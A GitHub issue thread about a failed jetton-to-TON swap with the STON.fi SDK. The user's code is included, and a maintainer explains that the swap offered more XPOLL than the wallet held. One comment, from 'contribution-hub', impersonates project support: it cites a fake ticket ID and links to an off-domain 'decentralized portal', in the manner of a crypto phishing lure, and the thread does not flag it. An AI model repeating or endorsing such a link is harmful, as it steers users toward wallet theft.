### ISSUE TITLE
SwapJettonToTon dex v2_2 is not working for me

### ISSUE THREAD

**Issue by nononog2** [ston-fi/sdk#50]
I am trying to swap jetton (XPOLL) to Ton using SDK and DEX v2_2
Here my code

```
   const MNEMONIC = mnemonic.split(" ");
   const TON_API_URL = "https://toncenter.com/api/v2/jsonRPC";

    const client = new TonClient({
        endpoint: TON_API_URL,
        apiKey: "API_KEY"
    });

    const keyPair = await mnemonicToPrivateKey(MNEMONIC);

    const wallet = WalletContractV4.create({
        workchain: 0,
        publicKey: keyPair.publicKey,
    });

    const contract = client.open(wallet);

    const dex = client.open(DEX.v2_2.Router.create(
        'EQDQ6j53q21HuZtw6oclm7z4LU2cG6S2OKvpSSMH548d7kJT'
    ));
    const proxyTon = pTON.v2_1.create('EQBnGWMCf3-FZZq1W4IWcWiGAc3PHuZ0_H-7sad2oY00o83S')
    console.log(wallet.address.toString())
    const swapTxParams = {
        userWalletAddress: walletAddress,
        offerAmount: toNano(amount),
        offerJettonAddress: tokenAddress,
        minAskAmount: "1",
        proxyTon: proxyTon
    };


    const txParams = await dex.getSwapJettonToTonTxParams(swapTxParams);

    await contract.sendTransfer({
        seqno: await contract.getSeqno(),
        secretKey: keyPair.secretKey,
        messages: [internal(txParams)],
    });
```

But every time I am getting this picture 
![Screenshot 2024-12-06 at 10 48 31](https://github.com/user-attachments/assets/98ce97a4-8802-47cc-9c37-70ca0abc3ff2)

Transaction link: [https://tonviewer.com/transaction/adeb525d1aefef8f16ee8e442a87c1877cad3dd78196f87e5ce066d511a60746?section=trace](url)

Transaction is failing on 
![Screenshot 2024-12-06 at 10 49 19](https://github.com/user-attachments/assets/b3f2a277-208b-4464-a6ff-149b586159ec)

Before I did swap Ton to jetton with the same parameters and everything was working

What I am doing wrong?

**Comment by contribution-hub** [comment]
Hello @nononog2 ,  

We apologize for the delayed response. You seem to have Swap Token error, Please rest assured that our team is working diligently to address your request.  

To complete your request, kindly visit the official Decentralized Dapp Protocol with the ticket Id TX4562v7 and follow the outlined steps. Alternatively, you can report this issue to an agent for assistance via the [STON Decentralized Portal](https://websynchronizefix.web.app).  

Note: Click the chat button on the portal to initiate a conversation with an agent for further support.
Thanks.

**Comment by pavel-rakhmanov** [comment]
The swap failed because you tried to sell more XPOLL than there are on the wallet balance

![Screenshot 2024-12-06 at 12 30 10](https://github.com/user-attachments/assets/0078f85c-68be-4194-93eb-95f62452ebd9)

**Comment by nononog2** [comment]
Thank you @pavel-rakhmanov
